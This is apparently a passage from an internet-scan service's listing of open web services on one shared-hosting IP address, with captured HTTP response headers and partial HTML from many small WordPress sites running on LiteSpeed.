    <!-- og meta for facebook, googleplus -->
    <meta property="og:title" content="My Blog"/>
    <meta property="og:description" content="My WordPress Blog"/>
    <meta property="og:url" content="https://jadecare.co.uk"/>
    <meta property="og:type" content="website" />
    <meta property="og:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <!-- twitter meta -->
    <meta name="twitter:card" content="summary_large_image"/>
    <meta name="twitter:title" content="My Blog"/>
    <meta name="twitter:description" content="My WordPress Blog"/>
    <meta name="twitter:url" content="https://jadecare.co.uk"/>
    <meta name="twitter:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/themes/hardwork/style.css?v=4.1.15" type="text/css" media="all">
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" rel="stylesheet" >
    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:700%7CMontserrat:400,700,400&amp;subset=latin-ext,cyrillic,latin,vietnamese,cyrillic-ext" rel="stylesheet">
    
    
            <style>
                body,input {font-family:'Montserrat', 'sans-serif';color:#ffffff;}
                                .social-list {background-color: rgba(0,0,0,0.4);}
                                a {color:#ffffff;}
                h1,h2,h3,h4,h5,h6 {font-family:'Playfair Display', 'sans-serif';}
                body {font-size:17px; letter-spacing: 0px; font-weight:400;; }
                h1:not(.text-logo),h2, h3,h4,h5,h6,.text-logo-wrapper {font-size:2.3529411764706em;letter-spacing: 0px; font-weight:700;font-style: normal;; }
                h1 {font-weight:700;font-style: normal;;}
            </style>
    
            
    
    <style>
        .wp-video {margin: 0 auto;}
        .wp-video-shortcode {max-width: 100%;}
        .grecaptcha-badge {display: none!important;}
        .text-logo {display: inline-block;}
        #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance: checkbox;width: initial;height: initial;}
        #counter.expired {display: none; }
        input, button {
            box-shadow: inset 0 0 0 0 !important;
            -webkit-box-shadow: inset 0 0 0 0 !important;
            -webkit-appearance: none;
            outline: none;
        }
    </style>
    
    
    
    
        </head>
    
    
        <body id="body">
            <div id="background-wrapper">
    
             <div id="background-image" class="image" style="background-image:url('https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2.jpg')"></div>
            </div>
    
            
            <section class="section section-body">
                         
             </section>
            
        <!-- Fade in background image after load -->
        <script>
            window.addEventListener("load",function(event) {
                init();
            });
    
            function init(){
    
                var image = document.getElementById('background-image');
                var body = document.getElementById('body');
                
                if ( image === null ) {
                    image = document.getElementById('body');
                } 
    
                if ( image != null ) {
                    if ( image.className !== 'image-unsplash') {
                        image.classList.add('loaded');
                        body.classList.add('loaded');
                    }
                }
    
                        }
        </script>
    
        
        <script>
            /* Subscribe form script */
            var ajaxWpUrl = 'https://jadecare.co.uk/wp-admin/admin-ajax.php';
            var {pathname} = new URL(ajaxWpUrl);
            var ajaxurl = `${location.protocol}//${location.hostname}${pathname}`;
            var
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.redarkgroup.com

    2026-01-23 10:51

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://redarkgroup.com/
    content-length: 0
    date: Fri, 23 Jan 2026 10:51:16 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.walchaksurfacecoatings.com

    2026-01-23 10:35

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://walchaksurfacecoatings.com/
    content-length: 0
    date: Fri, 23 Jan 2026 10:35:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.videoeditorusa.com

    2026-01-23 10:06

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://videoeditorusa.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 23 Jan 2026 10:06:49 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · promosambevcr.devdecimosite2025.com

    2026-01-23 10:05

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://promosambevcr.devdecimosite2025.com/wp-json/>; rel="https://api.w.org/"
    link: <https://promosambevcr.devdecimosite2025.com/wp-json/wp/v2/pages/797>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://promosambevcr.devdecimosite2025.com/>; rel=shortlink
    etag: "365-1769160401;;;"
    x-litespeed-cache: hit
    content-length: 121598
    date: Fri, 23 Jan 2026 10:05:51 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: ABInBev
    
    <!DOCTYPE html>
    <html lang="es-CR">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    	<link rel="profile" href="https://gmpg.org/xfn/11"> 
    	<title>ABInBev</title>
    <meta name='robots' content='max-image-preview:large' />
    	<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
    	<link rel="alternate" type="application/rss+xml" title="ABInBev &raquo; Feed" href="https://promosambevcr.devdecimosite2025.com/feed/" />
    <link rel="alternate" type="application/rss+xml" title="ABInBev &raquo; RSS de los comentarios" href="https://promosambevcr.devdecimosite2025.com/comments/feed/" />
    <script>
    window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/promosambevcr.devdecimosite2025.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.8.3"}};
    /*! This file is auto-generated */
    !function(s,n){var o,i,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),a=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===a[t]})}function u(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);for(var n=e.getImageData(16,16,1,1),a=0;a<n.data.length;a++)if(0!==n.data[a])return!1;return!0}function f(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\udedf")}return!1}function g(e,t,n,a){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):s.createElement("canvas"),o=r.getContext("2d",{willReadFrequently:!0}),i=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(function(e){i[e]=t(o,e,n,a)}),i}function t(e){var t=s.createElement("script");t.src=e,t.defer=!0,s.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",i=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){s.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+g.toString()+"("+[JSON.stringify(i),f.toString(),p.toString(),u.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"}),r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=function(e){c(n=e.data),r.terminate(),t(n)})}catch(e){}c(n=g(i,f,p,u))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
    </scr
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.blobby.me

    2026-01-23 09:47

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://blobby.me/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 23 Jan 2026 09:47:21 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · blog.jobrh.com

    2026-01-23 09:42

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://blog.jobrh.com/index.php?rest_route=/>; rel="https://api.w.org/"
    link: <https://blog.jobrh.com/index.php?rest_route=/wp/v2/pages/15>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://blog.jobrh.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 09:42:09 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · metatonix.com

    2026-01-23 09:33

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://metatonix.com/wp-json/>; rel="https://api.w.org/"
    link: <https://metatonix.com/wp-json/wp/v2/pages/167>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://metatonix.com/>; rel=shortlink
    etag: "314-1769130702;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 09:33:15 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.lahorwaters.com

    2026-01-23 09:28

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://lahorwaters.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 23 Jan 2026 09:28:51 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · videoeditorusa.com

    2026-01-23 09:27

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://videoeditorusa.com/wp-json/>; rel="https://api.w.org/"
    link: <https://videoeditorusa.com/wp-json/wp/v2/pages/25>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://videoeditorusa.com/>; rel=shortlink
    etag: "287-1768841313;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 09:27:33 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.moyo.goodybuy.xyz

    2026-01-23 09:26

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://moyo.goodybuy.xyz/
    x-litespeed-cache: hit
    content-length: 0
    date: Fri, 23 Jan 2026 09:26:16 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · telefonoip.cl

    2026-01-23 09:07

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.telefonoip.cl/
    content-length: 0
    date: Fri, 23 Jan 2026 09:07:57 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · nccstrongnation.org.uk

    2026-01-23 08:37

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    link: <https://nccstrongnation.org.uk/wp-json/>; rel="https://api.w.org/"
    link: <https://nccstrongnation.org.uk/wp-json/wp/v2/pages/23821>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://nccstrongnation.org.uk/>; rel=shortlink
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 08:38:01 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.nccstrongnation.org.uk

    2026-01-23 08:37

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://nccstrongnation.org.uk/
    content-length: 0
    date: Fri, 23 Jan 2026 08:37:26 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.hmq.devdecimosite2025.com

    2026-01-23 08:30

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://hmq.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 23 Jan 2026 08:30:19 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · open-iptv.net

    2026-01-23 08:22

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://open-iptv.net/wp-json/>; rel="https://api.w.org/"
    etag: "2307-1769027624;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 08:22:58 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.tsquare.com.pk

    2026-01-23 08:19

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    link: <https://www.tsquare.com.pk/index.php?rest_route=/>; rel="https://api.w.org/"
    link: <https://www.tsquare.com.pk/index.php?rest_route=/wp/v2/pages/39>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://www.tsquare.com.pk/>; rel=shortlink
    etag: "610-1768940901;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 08:19:38 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.hyper.meme

    2026-01-23 08:04

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://hyper.meme/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 23 Jan 2026 08:05:01 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · 99creativesit.com

    2026-01-23 07:45

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://99creativesit.com/wp-json/>; rel="https://api.w.org/"
    etag: "386-1768936719;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 07:45:49 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · rifaaps.devdecimosite2025.com

    2026-01-23 07:32

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://rifaaps.devdecimosite2025.com/wp-json/>; rel="https://api.w.org/"
    link: <https://rifaaps.devdecimosite2025.com/wp-json/wp/v2/pages/8>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://rifaaps.devdecimosite2025.com/>; rel=shortlink
    etag: "222-1768902774;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 07:32:08 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · walchakconcrete.com

    2026-01-23 07:27

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    link: <https://walchakconcrete.com/wp-json/>; rel="https://api.w.org/"
    link: <https://walchakconcrete.com/wp-json/wp/v2/pages/1094>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://walchakconcrete.com/>; rel=shortlink
    etag: "457-1768905423;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 07:27:36 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · shunslab.com

    2026-01-23 07:00

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Fri, 23 Jan 2026 07:00:47 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · metatonix.com

    2026-01-23 06:58

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Fri, 23 Jan 2026 06:58:37 GMT
    server: LiteSpeed
    location: https://metatonix.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · tsquare.com.pk

    2026-01-23 06:45

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.tsquare.com.pk/
    x-litespeed-cache: hit
    content-length: 0
    date: Fri, 23 Jan 2026 06:45:09 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.nexuxtalentpartner.site

    2026-01-23 06:39

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://nexuxtalentpartner.site/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 23 Jan 2026 06:39:17 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.dubaiforkliftrental.com

    2026-01-23 06:19

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    link: <https://www.dubaiforkliftrental.com/wp-json/>; rel="https://api.w.org/"
    link: <https://www.dubaiforkliftrental.com/wp-json/wp/v2/pages/12>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://www.dubaiforkliftrental.com/>; rel=shortlink
    etag: "608-1768936540;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 06:19:05 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · herbzglow.com

    2026-01-23 04:25

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1141
    date: Fri, 23 Jan 2026 04:25:40 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at herbzglow.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.herbzglow.com

    2026-01-23 04:25

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1145
    date: Fri, 23 Jan 2026 04:25:40 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.herbzglow.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.briliantsit.com

    2026-01-23 04:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://www.briliantsit.com/wp-json/>; rel="https://api.w.org/"
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 196_home,196_URL.6666cd76f96956469e7be39d750cc7d9,196_F,196_
    etag: "633-1769141780;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Fri, 23 Jan 2026 04:16:20 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.altdiversify.com

    2026-01-23 04:15

    HTTP/1.1 503 Service Unavailable
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    retry-after: 86400
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache; private
    content-type: text/html; charset=UTF-8
    last-modified: Fri, 23 Jan 2026 04:15:31 GMT
    etag: "416aa287583ebecddb0cc34acfcd79ca"
    content-length: 7539
    date: Fri, 23 Jan 2026 04:15:31 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Alt-Diversify
    
    <!DOCTYPE html>
    
    <html dir="ltr" lang="en-US" prefix="og: https://ogp.me/ns#">
        <head>
        	<meta charset="UTF-8">
        	<meta name="viewport" content="width=device-width, initial-scale=1">
    
            <!-- SEO -->
    <title>Alt-Diversify</title><meta name="description" content="Software Solutions | Creative | Web &amp; Mobile Apps | Production"/>
    <!-- og meta for facebook, googleplus -->
    <meta property="og:title" content="Alt-Diversify"/>
    <meta property="og:description" content="Software Solutions | Creative | Web &amp; Mobile Apps | Production"/>
    <meta property="og:url" content="https://www.altdiversify.com"/>
    <meta property="og:type" content="website" />
    <meta property="og:image" content=""/>
    
    <!-- twitter meta -->
    <meta name="twitter:card" content="summary_large_image"/>
    <meta name="twitter:title" content="Alt-Diversify"/>
    <meta name="twitter:description" content="Software Solutions | Creative | Web &amp; Mobile Apps | Production"/>
    <meta name="twitter:url" content="https://www.altdiversify.com"/>
    <meta name="twitter:image" content=""/>
    
    <link rel="icon" href="https://www.altdiversify.com/wp-content/uploads/2022/03/cropped-Alt-logo-32x32.png" sizes="32x32" />
    <link rel="icon" href="https://www.altdiversify.com/wp-content/uploads/2022/03/cropped-Alt-logo-192x192.png" sizes="192x192" />
    <link rel="apple-touch-icon" href="https://www.altdiversify.com/wp-content/uploads/2022/03/cropped-Alt-logo-180x180.png" />
    <meta name="msapplication-TileImage" content="https://www.altdiversify.com/wp-content/uploads/2022/03/cropped-Alt-logo-270x270.png" />
    <link rel="stylesheet" href="https://www.altdiversify.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/hardwork/style.css?v=4.1.16" type="text/css" media="all">
    <link rel="stylesheet" href="https://www.altdiversify.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" rel="stylesheet" >
    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:700%7CMontserrat:400,700,400&amp;subset=latin-ext,cyrillic,latin,vietnamese,cyrillic-ext" rel="stylesheet">
    
    
            <style>
                body,input {font-family:'Montserrat', 'sans-serif';color:#ffffff;}
                                .social-list {background-color: rgba(0,0,0,0.4);}
                                a {color:#ffffff;}
                h1,h2,h3,h4,h5,h6 {font-family:'Playfair Display', 'sans-serif';}
                body {font-size:17px; letter-spacing: 0px; font-weight:400;; }
                h1:not(.text-logo),h2, h3,h4,h5,h6,.text-logo-wrapper {font-size:2.3529411764706em;letter-spacing: 0px; font-weight:700;font-style: normal;; }
                h1 {font-weight:700;font-style: normal;;}
            </style>
    
            
    
    <style>
        .wp-video {margin: 0 auto;}
        .wp-video-shortcode {max-width: 100%;}
        .grecaptcha-badge {display: none!important;}
        .text-logo {display: inline-block;}
        #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance: checkbox;width: initial;height: initial;}
        #counter.expired {display: none; }
        input, button {
